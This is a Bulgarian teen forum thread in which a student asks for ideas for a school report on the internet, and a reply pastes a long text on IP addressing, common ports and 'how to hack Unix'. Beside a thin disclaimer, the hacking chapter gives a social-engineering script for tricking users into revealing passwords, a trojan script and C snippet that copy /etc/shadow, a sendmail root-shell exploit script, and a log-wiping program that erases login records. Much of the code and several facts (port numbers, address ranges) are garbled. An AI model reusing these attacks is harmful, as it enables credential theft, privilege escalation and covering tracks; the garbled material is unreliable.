PDA

View Full Version : Доклад за Интернет



bebygirl
02-14-2009, 22:05
По информационни технологии ни карат да пишем доклад за интернет ,но нз какво точно да пиша даите идей

*Липсва описателно заглавие!
Точка 7 от Правила на форума (http://www.teenproblem.net/f/pravila.html).
Редакция на MakeMeLaugh

Tedi4ka
02-15-2009, 01:13
Хекери
Интернет съществува първо като ARPNet през 60 години. Това е била мрежа, която свързвала различни научни центрове и университети в САЩ, които са участвали в проекти, финансирани от DARPA (Defense Advanced Reserch Projects Agency). До началото на деветдесетте Internet съществуваше основно като мрежа използвана от университети и корпорации (Главно компютърни компании). В началото на дветедесетте години благодарение на няколко фактора,като появата на по-бързи модеми, създаването на HTTP и Worid Wide Web беше поставено началото на феноменаизвестен днес като Internet (въпреки, че голяма част от тези, които говорят за Internet разбират само Worid Wide Web).

Какво е в основната на Мрежата
В Intenet, отделните компютърни системи се свързват в мрежи, които на свой ред се разделят на под мрежи. Всеки компютър (или устройство) в мрежата си има свой специфичен адрес, който се нарича IP адрес. IP се разделя на четири отделни части, които се наричат октети. Тези октети взети заедно дефинират уникален адрес като част от тях описват мрежата и/или подмрежата, а част от тях посочват дадено звено в мрежата.
/* TCP/IP означават Transmition Control Protocol /Internet Protocol. Това са двата протокола за достъп до Internet. */
IP адресите са орентирани в пет класа то Клас А до Клас Е. В зависимост от това колко голяма е дяната граница или по-точно нейната мрежа се определя и типа на IP адрес, който ползва тя. Мрежите клас А са достатъчно големи, за да се използват с до 167 772 машини. Те обикновено се използват от много големи организации и по съответните им мрежи. Също така много образователни институции са свързани към мрежата, използвайки клас А адрес. Клас Б мрежите са следващите по големина след Клас А като максимума системи които може да бъдат свързани е 65 565.
Клас С мрежите са най-често използвани от малки компании. Освен това много от локалните Internet доставчици използват един или два блока от Клас С адреси в своята мрежа. Всеки блок в Клас С мрежа може да се използва за адресирането на до 255 машини.
Клас Д адресите са резервирани за IP Multicasting, а Клас Е адресите са запазени за експериментални цели.
/* Звено (noode) е общ термин използван за устройството в мрежа юта като по принцип се използва за система или рутър. Другите мрежови устройства като принтери и контроли (хълбове) не се наричат звено. */
Пример:
Октетът е компонентът IP адрес. Всеки адрес включва четири актета. Всеки актет може да има стойност от 0 до 255. При клас А адрес може да използвате последните три актета за адресирането на машините във вашата мрежа, при клас В адрес може да се използвате последните два адреса, докато при клас С може да използвате само последния актет. Това става по следния начин:
Клас А позволява използването на адресите от 10.0.0.1 до 10.255.255.255
Клас В 190.0.1. до 190.1.255.255
Клас С 230.1.1.1 до 230.1.1.255
Може би виждате, че при Клас А мрежата, имате три актета, които може да използвате при адресирането на машините във вашата мрежа, при клас В мрежа използване на два актета, а а при клас С имате на разположение само един.
IP адресите са така създадени,че да може да бъдат направени много малки мрежи от големите мрежи.Например може на направите 255. Клас В мрежи от Клас А и може на направите 255 Клас С мрежи от един Клас В блок. Тези по-малки мрежи се наричат под-мрежи (subnet).
/* Подрежа: мрежа създадена в рамките на по-голяма */
Когато се създават подмрежи се използват концепцията на маскирането.Маската на подмережата маркира отделните битове,за да покаже, къде свършва адреса на мрежата къде е пространството, което може да бъде използвано за адресирането на системи.
Ето няколко примера:
N = мрежов адрес;
H = адрес на машина
Пример за маската на подрежа Клас А мрежа:
NNNNNNNNNN.HHHHHHHH.HHHHHHHH.HHHHHHHH или представено в числата 0.255.255.255
Пример за маската на подрежа клас В мрежа:
NNNNNNNN.NNNNNNNN.HHHHHHH.HHHHHHHHH
или представено с число 0.0.255.255
Пример за маска на подрежа Клас С мрежа:
NNNNNNNN.NNNNNNNN.NNNNNNNN.HHHHHHHH
или представен в число 0.0.0.255
Този пример може да изглежда малко объркан затова ще бъде пояснен. Виждате,че всеки етикет (не забравяйте, в един IP адрес има четири) е представен с осем букви. Всяка буква представлява число в байт, който се нарича етикет.
Мрежовите адреси са доста трудни за запомняне, така че машините в мрежата би било хубаво да имат имена. Всяка машина може да има име както това е валидно и за мрежата. Името на мрежата се нарича област (domain). Имената на области може да се регистрират в InternetNIC или в някой друг регистър на имена. Всяка мрежа се регистрира в областите от високо ниво. За САЩ те са следните като трябва да се има в предвид, че някой то тях през последните няколко години се използва по цял свят.
.COM - търговска организация
.EDU - образователни институции
.ORG - сдружения с идеална цел
.NET - мрежи
.GOV - не-военни правителствени организации
.MIL - военни (препоръчително е да се стой по-далече от такива места)
Всяка държава има област от високо ниво по ISO. Например
US - САЩ
RU - Русия
BG - България
JP - Япония
FR - Франция
IT - Италия
DE - Германия
O - Тонга


Как общува отделните системи
Всеки сървър в Internet има отворени портове (при различните сървъри техния брой може да варира). За да не се срещнете затруднения да разберете какво е порт на сървър мислете за всеки от тях като за отделна врата на сграда. Някой от тези @врати са отворени, други затворени. През отворените портове програмните получават достъп до определени услуги и протоколи. През Unix тези програми се наричат deamon-i. Примери за daemont са telnetd-telnet daemon, ftpd - ftp daemon, sendmail - Unix mail програма, httpd - thhp daemon или казано по друг начин HTTP сървър. Към определени портове може да се свържете използвайки клиент програми за този порт или използвайки telnet клиент, който ще ви даде примитивен интерфейс за дадена услуга. Ето и описание на основните и най-често използвани портове и услугите, свързани с тях.

Порт 21 FTP
FTP (file transfer protocol) може да е най-използвания протокол за трансфер на файлове. На сървър системата работи ftp сървър, докато системата която се свързва може да използва произволен клиент, отговарящ на спецификацията. Клиентът на Unix системите по подразбиране е ftp (на Windows също, но за тази операционна система има редица по-добри клиенти). За отваряне на връзката към даден сървър най-често се пише ftp с името на съръвъра или негов IP адрес (например ftp.download.com или ftp 200.100.10.70)
Възможен е и друг вариант - стартирайте ftp и след това с командата open (след като се появи промпта ftp>) се свързвате с желания от вас сървър. След като връзката е осъществена сървърът изисква потребителско име и парола (username и password) за достъп до отдалечената система. На повечето ftp сървъри е включен и анонимен достъп т.е. използвайки anonymous като име на потребител и вашия e-mail (или други произволен e-mail за да бъдем по-точни) получавате възможност за достъп до файловете на сървъра, до които ви е даден достъп разбира се. След като потребителското име паролата са въведени чрез командата get може да копирате файл ,a чрез send може да изпратите файл. Списъкът на файловете и директориите се поучава чрез ls или dir (само някой реализации на ftp сървъри), докато директориите се променят със CD ИНТЕРВАЛ. За повече информация може да се напише ? или help след ftp> промпта.

Порт 22: Secure Shell: (сигурен/ кодиран шел)
Secure Shell е не толкова протокол колкото приложение, но все пак е хубаво да бъде споменат. Secure Shell е особено полезна за отдалечен достъп до компютърни системи.Той наподобява telnet i rlogin, но за разлика от тях кодира цялата информация по време на сесията. Следователно връзката не може да бъде подслушана(или поне разкодирането ще отнеме време),което повишава сигурността на работата. Клиент програмата са Secure Shell e ssh. За да стартирате ssh обикновено се използва следния синтаксис "ss -i username host". Host е компютъра към който се свързвате, а user naame е потребителското ви име. С написването на ssh ще видите списък на командите на програмата.

Порт 23; Telnet
Telnet е услуга, която се използва за отдалечен достъп до машини, свързани към мрежа. Unix (както споменахме и повечето други операционни системи) имат клиент за telnet, който в общия случай се каза по същия начин. За да се свържете към машина чрез telnet, трябва да стартирате съответния telnet клиент, който ще използвате с името на машината като аргумент например- teltnet yourhost.com. След като веднъж се свържете, може да контактувате с машината (поне с Unix системи) по същия начин, по който работите с нея и когато работите локално. Ако искате да се върнете в telnet промпта, то трябва да въведете ESC символа (по подразбиране това е ^]). След като се върнете в telnet може да изпълнявате други команди като напаример отново да влезете в системата или да се свържете с някоя друга. Telnet може да се използва и за други полезни и интересни неща.

Порт 25:SMPT
SMTP е може би най-често използвания протокол от високо ниво в Internet. Голяма част от потребителите дори не подозират съществуването му. Почти на всеки сървър в Internet е стартирана поддръжка за този протокол, тъй като той отговаря за дозтавянето на електронна поща. За достъп до този протокол има множество различни приложения, известни под общото име клиенти за електронна поща. Всяко което е необходимо на потребителя да направи е да въведа адреса на получателя и да напише писмото - след това пощата се изпраща със съответната команда в зависимост от e-maila на клиента. Има някой интересни приложения на SMTP, така че мрежовите администратори трябва внимателно да настроят своя сървър за да избегнат нежелателни вреди.

Порт 53 DNS
DNS е порта, на който в Unix работи Internet Domain Name Server Daemon (BIND) или казано по друг начин на този порт е достъпна DNS услугата. Преди да разберете за какво става въпрос трябва да разберете самия протокол. Всяка машина в Internet си има свое име като на това име съответства на накакъв IP адрес. DNS сървърите съдържат таблици, в които са записани IP адресите, които отговарят на съответните имена. Таблиците са представени имат дървовидна конфигурация. Например имената на области от високо ниво за .com, .edu и
.net .com .edu
mp.net .sun.com .mit.edu
mach1.mp.net mach.sun.com maach1.mit.edy

сочат към всички DNS сървъри от следващо ниво като sun.com или mit.edu. Тези вторични DNS сървъри извършва препратките към следващото ниво като например към machine1.mit.edu.

Порт 79: Funger
Finger е протокол за ползване на информация за даден потребител на системата. Finger обикновено предоставя информация за потребителя. Това е един полезен протокол, но е препоръчително той да бъде деактивиран, тъй като той предоставя информация на тези, които се опитва да добият неправомерно достъп до машината. В Unix клиент програмата за този протокол съвсем логично е с име finger. Нормалния синтаксис който се използва е user@hostname.xxx. С finger @hostname.xxx се получава списък на потребителите, които в момента са влезлия системата.

Порт 800; HTTP
HTTP е в основата на Web. ИМа твърде много клиенти за този протокол, които са известни по името браузъри. Едва ли е необходимо да се обяснява как се работи с тях. В крайна сметка именно благодарение на тях, Internet придоби популярността която има днес.

Порт 110; POP3
POP (Post Office Protocol) е протокола, който основно се използва за извличане на пощата от отдалечен/локален сървър. Съществува още един протокол за работа с електронна поща известен като IMAP. За извличане на електронната поща и нейното четене има твърде много клиент програми.

Порт 119; NNTP
NNTP (Network News Transfer Protocol) се използва като сочи името за трансфер на news съобщения между отделните машини. Като с повече други протоколи за работа с него има твърде много клиенти. В Unix традиционния клиент е с името tin.

Глава 2
Как се хаква Unix - основите
Учудващо голям е броя на "хакерите" които нямат понятие от системите, в които се опитват да проникнат. Те са видели някого или са прочели някъде как да се възползват от пропуските в системите и след като проникнат в тях нямат представа какво може да се случи или дори какво правят.
Това не е материал, които има за цел да ви научи на всичко - това е просто невъзможно, защото най-добрия начин за обучение винаги е бил и ще бъде практиката. Все пак тук ще откриете идеи, които може да ви помогнат за разберете как се прониква в дадена система и съответно да знаете какви мерки да вземете, за да не стане вашата машина жертва на недобросъвестни лица. Още веднъж трябва да се подчертае, че проникването в чужди машини е незаконно и тези които са я използвали с подобна цел изцяло са отговорни за постъпките си. Никой обаче не може да ви забрани да прониквате в собствената си машина или машината на ваш приятел, които ви е помолил да проверите сигурността й.

Малко история
Unix е многопотребителска, многозадачна операционна система, създадена в Bell Labs в края на шестдесетте години. Нейни автори са група инженери, които преди това са работили по проекта Multics, който също е предвиждал разработката на многозадачна, многопоребителска операционна система и който е дал живот на повече изисквания за сигурност заложени в В2 и В3 сертификатите за сигурност. За първи път Unix е била стартирана на старите GE големи машини, но първо е била проектирана на DEC PDP микрокомпютрите. През следващите години се нароявят толкова много портове на Unix , че дори е трудно те да бъдат изброени (това едва ли е нужно)
През годините Unix приема много форми, но те може да бъдат групирани в две основни категории - BSD Unix системи и System V базирани системи BSD стандарта произлиза от University of California Berkeley и често се е смятало, че превъзхожда стандарта AT&T. Много от по-старите Unix операционни системи са били базирани в началото на npho, както и много от новите. Други системи се интегрирали възможностите на BSD в System V като например Xenix.
В последствие Unix премина на РС платформите в след това дойде Linux, който промени света на Unix.

Системата
Когато за първи път се свържете към Unix система, това най-вероятно ще стане с протокол наречен telnet. Когато се свържете към една система първото нещо, което ще видите е името на машината и версията на операционната система. Следващото ще бъде:
Login:
Дори да не видите името на машината, сигурно е, че ще видите logih и това означава, че се се свързали. След този промпт се очаква да въведете валидно потребителско име. Като цяло стандартните потребителски имена в Unix са до 8 символа, но това не е задължително - дължината им може да бъде увеличена. След като бъде въведено валидни потребителско име ще ви бъде поискана парола, която също обикновено е до 8 символа, но това също може да бъде променено.
В Unix няколко стандартни потребителски имена, които се инсталират по подразбиране на системата, така че тя да може да функционира правилно. Обикновено те са:
root: за системният администратор;
bin: собственик на бинарните файлове (най-често използваните изпълними файлове)
daemon: собственик на системните daemon-u (програми извършващи определени услуги на определени портове);
adm: рядко използвано име за системния администратор;
lp: собственик на принтерите
sync: рядко се използва за синхронизация на дисковете;
shutdown: рядко използвано са shutdown (спиране) на системата
halt: рядко използвана (за блокиране на системата)
mail: Собственик на някои от системните файлове свързани с пощата;
news: собственик на news - сървърните файлове;
uucp: собственик на UUCP изпълними файлове, които като цяло са вече напълно излишни;
operator: друго рядко използвано име за достъп от администратора
postmaster: за получаване на сгрешена поща и всякакъв боклук, обикновено свързан с root.

Проникването
Въпреки, че се твърди обратното, то обикновено всички тези потребителски имена с изключение на root са деактивирани. Това означава, че са напълно безполезни. Root трябва да има много сигурна парола, освен ако мозъка на администратора не е колкото на горила. Ако все пак някои реши да пробива, първото нещо което ще изпробва да бъде root, admin, sysadmin, manager или нещо подобно.
Може да започвате да се чудите как някой въобще прониква в Unix система. Има няколко основни метода като тук ще бъдат представени два от тях. Първият е чрез открадване/налучкване/кракване на парола. Това е най-традиционни подход. След него идва ред на препълването на буферите. Препълването на буферите е метод, които се състои от препълване (обикновено) на входен буфер на програмата. Когато това се направи както трябва, програмата се скрива и понякога ви остава в шела. Ако се случи програмата да бъде SUID root, тогава името root!
/* SUID; Set User ID. Това е параметърът, който се поставя на програма, която се изпълнява с привилегии, отговарящи на SUID. Понякога това се прави и с root привилегии, за да може програмата да има достъп до отделни файлове, които се нуждаят от тези привилегии - например /etc/shadow. */
Както вече беше написано открадването/налучкването/кракването на паролите е най-традиционния метод за добиване на достъп. Това може да се окаже много лесно ако убедите компютърно неграмотен идиот да ви даде потребителското си име и паролата или може да се окаже малко по-трудно да се доберете до файла с паролите и да стартирате кракваща програма.
Освен това възможно е паролата да бъде налучкана - възможни пароли са потребителското име, потребителското има написано отзад напред, рождената дата или телефонен номер, име на приятел/ родината, името на системата или дума, която е свързана с работата или професията.

Вариант 1:
Убеждаването на някой компютърен идиот да ви даде паролата си може да се окаже много лесно или доста трудно в зависимост от интелекта на идиота. Потребителите с опит или тези, които знаят за тази възможност е невъзможно да бъдат убедени в подобно нещо, но все пак вижте следния примерен разговор;
Идиот: Здрасти!
Хакер: Здрасти, аз съм от системните администратори и в момента планираме преместване на директориите на някой от потребителите на нови по-голям диск, по-късно днес. Нали това няма да създаде неудобства:
Идиот: Не. Аз приключих със системата за днес
Хакер:ОК. Ще имаме нужда от паролата ти, така че да извършим проверка и да видим дали файловете ти са прехвърлени както трябва. Потребителското ти име е Идиот, нали?
Идиот: Точно така. А паролата е "Голям идиот"
Хакер:Благодаря. Ще проверя всичко лично и всичко ще работи както трябва утре сутринта.
Идиот: Благодаря.
Разбира се, хакерът изглежда изключително компетентен и убеден, така че компютърно неграмотния потребител е далеч от мисълта да постави каквито и да е въпроси, които биха прозвучали некомпетентно. Но ако потребителя има поне малка представа за кво става въпрос, той дори няма да се замисли преди да ви откаже.
Подобни запитвания са правени дори и по електрона поща и най-интересно е, че са получавали отговори, съдържащи паролата за достъп.

Вариант 2:
Също така е възможно да бъде откраднат файла със системните пароли. Това може да бъда направено и отдалечено, въпреки че е малко по-трудно. В по-старите версии на Sendmail има начин за това (има редица други бъгове, които може да бъдат използвани, но целта не е запознаването с тях, а запознаването с начините, по които се действа). С някой по-стари версии на Snedmail е възможно да изпратите файла с паролите като поща до самия себе си след това с някоя от многото разпространени програми за целта да разкодирате паролите. Освен това с FTP също може да бъде откраднат файла с паролите, ако системния администратор не се е погрижил за тази възможност.
Ако вече имате достъп до системата, всичко става много просто. Копирате файла с паролите в директорията си и с FTP го копирате извън нея. Това може да стане със следната команда
cp /etc/passwd/your/home/directory/passwd
или
cat /etc/passwd > /your/home/directory/passwd
След това с FTP той се копира на собствената ви машина, където се стартира програма, с която се изваждат паролите и се декодират.
Тук обаче може да се сблъскате с друг проблем. Файлът с паролите може да е "shadow". Shadow е схема, чрез която файлът става по-труден за откриване и кракване. При нея информацията за потребителя с изключение на паролата се започват в /etc/passwd, а самите пароли се започват в друг файл, за който са необходими root привилегии и то се нарича shadow файл. Има различни имена за него, но най-често те са /etc/shadow или /etc/master.passwd.
Файл с пароли, който има shadow може да бъде разпознат по това, че в него са всички символи на паролите са заменени с символи на 'х' или "!".
Ето как изглеждат паролите:
Username:Encrypted
Password:UID-GID;GECOS:Home Directory;Shell
Очевидно е, че "Username" и "Encrypted Password" са полета с името и паролата UID и GID полетата съдържат потребителските ID и групов ID. GECOS полето съдържа информация за имената на потребителя, телефонния номер, офис и т.н. - информацията, която се показва при funger. Очевидно е предназначението на "Home Directory" и "Shell".
Явно трябва да имате root привилегии, за да откраднете shadow файла, но това не е точно така. Има няколко начина това да бъде заобиколено. Първо, може да администраторът да бъде заблуден да стартира приложението или скрипт, който като троянски коне да откраднат необходимите файлове. Ето подобен премерен скрипт, така че администратори внимавайте какво стартирате.
echo "Initializing player information..."
cp /etc/shadow/my/home/directory/.shadow
cp /etc/passwd/my/home/directory/.passwd
shmod 777/my/home/directory/.shadow
shmod 777/my/home/directory/.passwd
echo "Segmentation fault (core dumped)"
touch core По-добър начин за реализацията му е предварително да се извърши проверка, която би изглеждла като в следната C програма:
if ( getuid() == 0 )
{
system ( "sp/etc/shadow/my/home/directory/.shadow" )
system ( "sp/etc/shadow/my/home/directory/.passwd" )
system ( "chmod 7777 /my/home/directory/.shadow" )
system ( "chmod 7777 /my/home/directory/.passwd" )
} // if
else
do_other_program_stuff();

Така чрез getuid се проверява дали са налице root привилегии и ако UID е равно на 0 ( root UID ), програмата се опитва да открадне файла с паролите. Ако системния администратор е подозрителен и не стартира от каквото му попадне с root. Това ще бъде по-убедително с не-root достъп вместо на екрана да бъде изведено съобщение, че липсват привилегии са достъп до /etc/shadow.
/* UID: Цифрова индикация на User ID на потребител в Unix система. Всички потребител си имат съответните права на UID. */
Възможно е shadow файла или част от него да бъде открадната чрез coredump.
/*Coredump: "core" файла, съдържа паметта в момента, в който програмата е забила. Използва се за дебъг при нормални обстоятелства, но недобросъвестни лица може да се възползват от него и да откраднат паролите. */
Ето пример за подобно открадване на паролите чрез imapd:
При въвеждането на непозната парола и потребителско имеimapd i ipop3d създават coredump:
[root@koek] #telnet zone 110
Trying 200.100.23.1...
Connectet to hostnaame
Escape character is' ^]'.
+OK hostname POP3 3.3(20) w/IMAP2 clinet (Comments to MRC@CAC.Wa
shihgton.EDU ot syn, 1 Feb 1998 23:45:06 + 0100
(CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[i have no user named john]
+OK User name accepted, password please
pass doe
Connection chosed by foreign host.
В този момент ipop3d записва coredumpps в /core:
Нека да допуснем, че хакерите са се сдобили с файла с паролите или shadow файла. Всичко което правят от този момент на там е да погледат за потребител без парола в shadow файла и след това да заменят съответните символи в password файла с празно място. Така, той е готов за разбиване. За това има повече от достатъчно програми - някои от тях за Unix, други за DOS или Windows - платформата е без значение.
Ако от файла бъде извадения някоя парола, то хакера има още една възможност. Ако бъде извадена root парола - много лошо - машината е негова.

Вариант 3:
Другия метод е препълване на буфер. Препълването на буфери обикновено се извършва със злоумишлени програми. Те се използват при след написани SUID програми. Когато буферът се препълни при SUID root програма тя забива и при някой обстоятелства ви остава привилегирован шел.
Следва пример за препълване на буфер при по-старите версии на sendmail
#/bin/sh
# This is exploint for sendmail smtpd bug
# (ver 8.7-8.8.2 for Free BSD, Linuz and may be other platforms).
# This shell script does a root shell in /tmp direcory.
#
#
echo 'main() '>> cmth.c
echo '{ '>>cmth.c
echo ' execl ( "/usr/sbin/sendmail", "/tmp/smtpd", 0);
' >> smth.c
echo '} ' >> cmth.c
#
#
echo 'main()
' >> smtpd.c
echo '{ ' >> smtpd.c
echo ' setuid(); setgid(0);
' >> smtpd.c
echo ' system ("cp/bin/sh/tmp;shmod a = rsx /tmp/sh");
' >> smtpd.c
echo '} ' smtpd.c
#
#
cc -o smth smth.c; cc -0 /tmp/smtpd smtpd.c
./smth
kill -HUP 'ps -ax | grep /tmp/smtpd | grep - v grep | tr -d'
' | tr -cs "[:digit]" "\n" | head -n 1'
rm smth.c smth.c /tmp/smtpd
echo "Now type: /tmp/sh"

Това е шел скрипт, който може чрез echo да записва С код в два други С файла, компилира ги и след това ги стартира като резултатът е root шел в системата, работеща с уязвима вересия на Snedmail.
Едва ли има какво повече да се каже за препълването на буферите - те са бърз начин да се придобие достъп до системата. Въпросът е какво обикновено се прави, когато някой добият достъп до нея.

За какво се използват чуждите системи?
След като веднъж се проникне в чужда система обикновено тя се използва за атаки срещу други системи, открадване на файлове и други неща. Ако е откраднат root достъп, системата е в ръцете на хакера - той може да прави каквото си поиска - да добавя потребители, да изтрива потребители и т.н. Разбира се, подобни груби намеси като забиване ли изтриване на файлове и други подобни биха били дело само на някой идиот, който си няма понятие от хакерска етика и не подозира, че това е най-сигурния начин да привлече вниманието на системните администратори.
След като хакерът веднъж проникне в системата има различни начини на действие. Но при всички случай той е стартирал шел. Има толкова много шелове, но повечето от тях са вариации на Bourne shell [sh или bash], C shell [csh], Korn shell [ksh] и Z shell [zsh]. Важно е какви шелове има в системата, защото в зависимост от тях се предприемат различни тактики за прикриване на следите. Логично е, че всеки хакер ще се опита да прикрие следите си. Ако хакерът е проникнал с обикновени права една ли може да направи кой знае какво, за да се скрие. Ако има root права, той ще може да направи всичко. Естествено само някой пълен глупак би изтрил log файловете. В подобен случай всеки администратор трябва да провери какво става на системата му - със сигурност има нещо ГНИЛО!
Хитрите хакери обаче ще използват програма подобна на тази:
/* !!! Да ама не е изпорбвана липсват ми маса Heads !!! */
#include <SYS/TYPES.H>
#include <STDIO.H>
#include <UNISTD.H>
#include <SYS/FILE.H>
#include <FCNTL.H>
#include <UTMP.H>
#include <PWD.H>
#include <LASTLOG.H>
#define WTMP_NAME "/usr/adm/wtmp/"
#define UTMPT_NAME "/etc/utmp"
#define LASTLOG_NAME "usr/edm/lastlog"
int f:
void kill_utmp (who)
char *who;
{
struct utmp utmp_ent;
if ((f = open (UTMP_NAME, O_RDWR)) > 0 ) {
while ( read (f, &utmp_ent, sizeof (utmp_ent)) > 0 )
if (!strncmp (utmp_end.ut_name, who, strlen (who))) {
bzero (( char* &utmp_ent, sizeof (utmp_ent_));
lseek ( f, -(sizeof (utmp_ent)), SEEK_CUR);
write ( f, &utmp_emt, sizeof (utmp, ent));
} /* !strncmp */
close ( f )
}
} /*kill_utmp (who) */
/* */
/* */
void kill_wtmp (who)
char *who;
{
struct utmp_ent;
long pos;
pos = 1L;
if (( f = open (WTMP_NAME, O_RDWR)) > 0 ) {
while (pos != 1L ) {
lseek (f, -long) ( (siezeof (struct, utmp)) *pos), L_XTND);
if ( read (f, &utmp_ent, sizeof (struct utmp)) > 0 ) {
pos = -1L;
} else {
if ( !strncmp (utmp_ent.ut_name, who, strlen (who))) {
bzero (( char *) &utmp_ent, sizeof (struct utmp ));
lseek ( f, sizeof (struct utmp)) *pos, L_XTND );
write ( f, &utmp_ent, sizeof (utmp_ent) );
pos = -1L;
} else { pos + 1L; }
}
}
close (f);
}
} /* kill_wtmp */
/* */
/* */
void kill_lastlog (who)
char *who;
{
struct pasdwd *pwd;
struct lastlog newll;
if ( (pwd = getpwnam (who)) != NULL ) {
if ( (f = open (LASTLOG_NAME, O_RDWR)) >= 0 {
lseek ( f, (long) pw -> pw_uid *sizeof (struct lastlog), 0 );
bzero ((char *) &newll, sizeof (newll) );
write ( f, (char*) &newll, sizeof (newll) );
}
}
} /* kill_lastlog */
/* */
/* */
void kill_lastlog (who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ( (pwd = getpwnam (who)) = NULL) {
if (f = fopen (LASTLOG_NAME, O_RDWR)) >= 0) {
lseek ( f, long) pwd _. pw_uid* sizeof (struct lastlog), 0 );
bzero ( (char*) &newll, sizeof (newll) );
write ( f, (char*) &newll, sizeof (newll) );
close ( f );
}
} else { printf ( "%s :? \n", who ); }
} /* kill_lastlog (who) */
/* */
/* */
main(argc, argv, envp)
int argc;
char *argv[];
char *envp;
{
if ( argc == 2 ) {
kill_lastlog ( argv [1] );
kill_wtmp ( argv [1] );
kill_utmp ( argv [1] );
printf ("Zap1!\n");
} else { printf ("Error\n"); }
} /* main */

С използването на подобна програма хакера може да стане почти невидим за системата. Разбира се, при условие, че не тръгне д @атрие log файловете. Системния администратор е хубаво да следи и history файловете, защото в тях се съдържа всяка команда въведена от потребител. ".history" и ".bash_history~ съдържат всички команди въведени по време на работата, така че ако невнимателен хакер ги остави това също може да помогне за засичането му.

Защо Unix?
Тези редове са специално за тези, които се чудят защо още не са виждали Uniix и си мислят. че могат да направят Internet сървър или нещо подобно на Widows машина без да се чудят всяка сутрин дали машината им не е хакната.
Сигурно вече започвате да си мислите, че Unix е несигурна система и че всеки прочел горните редове ще проникне във вашият сървър? За щастие това не е точно така. Обикновено за осъществяването на проникването са необходими дни, седмици и понякога месеци в зависимост от това доколко системния администратор е в част с материала.
Да, но защо все пак говорим само за сигурността на Inix, а не на NT? Много просто всеки, който успее успешно да проникне в правилно защитена Unix машина, ще се справи и с NT след като събере малко информация (а такива има в излишък, благодарение на бъговете, които Microsoft оставя щедро в софтуера си
Така, че по-добре изберете Unix.
Ето и част от командите, които на първо време човек трябва да знае (част от тях са подобни на DOS, но Unix прави разлика между главни и малки букви):
Unix команда Dos команда Действие
ls Dir
ls -l Dir /W
ls -a Dir /AH
cd CD
rm Del
cp Copy
mv Move
ln N/A Създават shortcut
pc N/A Показва процесите на текущ потребител
pc-uax N/A Показва всички процеси
w N/A Показва списък на потребителите в системата
logout N/A Излиза от системата
chmod Attrib Промяна атрибутите на файловете
chwon N/A Промяна собственика на файла
man Help
gcc Н/А Компилира С файлове
cc N/A Компилира С файлове
netstat N/A Мрежова информация
du ChkDsk


Файловата система на Unix
Файловата система в Unix е много мощна и с големи възможности - нещо повече сигурността е част от нея. Тя позволява файлови имена до 255 символа при някой реализации и няма ограничение за трисимволно разширение.
В Unix главната директория е '/'. Освен това не се използват отделни букви за устройствата - ако имате два диска те са в главната директория и поддиректория на главната. В главната директория има няколко стандартни поддиректории:
/bin: Съдържа системни изпълними файлове
/etc: Съдържа конфигурационна информация
/dev: Съдържа device файлове.
/var: Съдържа log файлове, mail и news spool директории и т.н.
/home: Съдържа директориите на потребители.
/usr: Съдържа повечето изпълни файлове и информация. Изпълнимите файлове са в /usr/bin, файлове на С компилатора има в /usr/lib (понякога /lib).
/lost + found: Съдържа index, които може би са повредени при сривове в системата.
/mnt: Понякога устройствата с преносими носители са mount тук.
/tmp: /Временни файлове. Обикновено се изтриват при всяко презареждане.
/proc: Това е виртуална файлове система, която има информация за всички процеси които работят.
/sbin: Тука обикновено са файловете за системата диагностика и администрация.

Файлови атрибути
Файловата система в Unix разполага набор битове, които определят типа на файла. Атрибутите на файл имат четири позиции.
Първата позиция определя дали файла е специален по няколко начина - има четири бита, които може да определят различни неща:
d: директория
l: връзка
c: символно устройство
b: блоково устройство
Файл, който няма никой от тези атрибути или е просто данни или е изпълним файл.
Втората позиция е набор от три бита, които индицира какви привилегии има собственика на този файл.
r: четене
w: запис
x: стартиране
s: SUID бит.
Третата позиция са привилегиите, с които разполагат членовете на групата, която притежава файла. Тук има три бита и те отговарят на първите три стойности при втората позиция.
Четвъртата и последна позиция за привилегиите на другите потребители и се отнасят за всеки друг потребител. В него е информацията за достъп за всеки потребител който не е собственик или не е член на групата. Четвъртата позиция също е три битова и е идентична с третата.
Ето пример за 'ls-l' списък на директория:
-1---------1 root root 715 Jun 14 16:16 /etc/shadow
Тук файла "/etc/shadow" се притежава от root потребителя и root групата като може само да чете от root потребител. Всеки друг в системата няма достъп до него.
Друг пример:
irwxrwxrwx 1 rot root 8 Aug 28 19997 /tmp -> /var/tmp
"/tmp" е връзката към "/var/tmp". Тя е притежание на root потребител и root групата и може да се чете, записва и изпълнява от всеки потребител.
Друг пример:
drwxr-xr-xr 8 root root 1024 Jun 18 14:15 mothra
Това са накратко някой от основните неща за Unix, но всеки който има по-сериозни намерения за инсталация, използване или подобряване на сигурността на работеща система трябва да прочете много.

Мрежови услуги
Може би трябва да се каже още нещо за мрежовите команди на Unix - тази операционна система и Internnet вървят ръка за ръка. Очевидно е, че ако знаете как да използвате мощта на операционната система в мрежата. Следва кратко запознаване с мрежовите услуги:

Порт 11: Systat
Ако изпълните telnet на порт 11 на машината, може да имате късмет и да видите резултатът от командата who или ps. Администраторът трябва да е пълен глупак ако получите резултат, защото чрез тази информация отваря дупка в сигурността.

Порт 15: Netstat
На този порт при неразумен системен администратор може да се види резултатът от командата netstat. Не особено разумно - информацията може да се използва за проникване в системата.
Порт 21: FTP
Порт 22: SSH
Порт 23: Telnet

Порт 25: SMTP
Стандартен порт на e-mail daemon. Съществуват множество начини той да се използва за нелегално проникване. Най-добрата политика е следене в Internet за откриване на пропуски в сигурността и инсталирането на пачове за тях.
Порт 53: BIND (DNS)

Порт 69: TFTP
Trivial FTP - ако видите система с този отворен 69 порт, веднага може да се копира файла с паролите от нея. Много, лесно малко вероятно да бъде открита подобна система.

Порт 79: Finger
Finger е протокол, който предоставя информация за потребителите. За него има DoS атаки, използващи техника, наречена 'пренасочване' (redirecting). Като цяло няма специфични уязвими места, които може да се използват, въпреки че винаги има изключения, но с информация, която евентуално злонамерено лице можа да се сдобие може да му помогне да придобие достъп.

Порт 80: HTTP
Портът, който се използва от HTTP протокола. HTML не открива пропуски възможности за проникване, но CGI и други скрипт езици със сигурност компенсират това.

Порт 110: POP3
POP# e Post Office Protocol, Version 3. Както беше показано по-горе уязвимо място - трябва да се следи за проблеми и технически пачове.

Порт 111: Sun RPC Portmapper
Това е RPC portmapper е, които map-ва портовете на други SUN RPC услуги. Има уязвими места.

Порт 119: NNTP
Netnews - ако хакера знае какво прави ще може да използва този порт, но не особено успешно.
Сигурно вече се чудите дали има лесен начин за откриване на отворени портове на дадена система. Ето програма, която извършва това:
